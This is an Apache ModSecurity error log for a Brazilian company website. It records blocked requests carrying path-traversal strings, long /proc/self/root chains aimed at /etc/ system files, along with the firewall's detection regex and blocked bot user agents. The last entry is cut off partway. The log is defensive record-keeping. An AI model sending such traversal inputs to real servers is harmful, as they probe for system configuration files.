[Fri Mar 20 09:06:52.552462 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:58128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04XDJ3M9BSuKP7CAYsBgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:06:55.069767 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.243.128:58130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04X_HIg5MgXLBnicMEKAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:07:33.717329 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:58142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04hfXLqtnMIWvjpaKnywAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:07:40.260542 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04ita6ubjKNq_cu4bkGAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:08:04.061803 2026] [mime_magic:error] [pid 7893:tid 140411557287680] (70014)End of file found: [client 57.141.18.45:57084] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:08:41.432252 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.228.61:36950] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab04yV1pVZ5mVmJwsFM_QQAAAEE"]
[Fri Mar 20 09:08:56.560269 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:57156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab042Lninkcc-iUj5AprhQAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:09:26.478309 2026] [mime_magic:error] [pid 21219:tid 140411674785536] (70014)End of file found: [client 57.141.18.83:60138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:10:02.724706 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.244.43:32832] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab05GhCii7xarUs8iHZ1HwAAAhE"]
[Fri Mar 20 09:13:08.920545 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.5:39732] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab050zJ3M9BSuKP7CAYtEgAAAJg"]
[Fri Mar 20 09:13:43.098832 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.228.61:53136] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab059_HIg5MgXLBnicMFawAAAcc"]
[Fri Mar 20 09:14:39.419128 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:58716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06LwF0L0L-SsrnPo53VAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:14:48.191625 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:45726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06OPXLqtnMIWvjpaKpJAAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:14:56.080804 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:39402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06QDJ3M9BSuKP7CAYtagAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:02.751708 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.244.43:37742] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab06RhCii7xarUs8iHZ2LQAAAg4"]
[Fri Mar 20 09:15:03.925549 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:39404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06R9a6ubjKNq_cu4blewAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:08.582519 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.243.128:43910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06TF1pVZ5mVmJwsFNAcQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:12.056183 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:43598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06UOoXxyEfFpUF8f-PKwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:13.363324 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:43606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06Ubninkcc-iUj5ApssAAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:14.768545 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:43622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06Uta6ubjKNq_cu4blgwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:22.367726 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:43636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06WvHIg5MgXLBnicMFrgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:23.613828 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:59426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06W11pVZ5mVmJwsFNAeQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:24.941545 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:59440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06XF1pVZ5mVmJwsFNAewAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:26.303187 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:59440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06Xl1pVZ5mVmJwsFNAggAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:27.676073 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:59456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06X_HIg5MgXLBnicMFsAAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:32.696000 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:59456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri 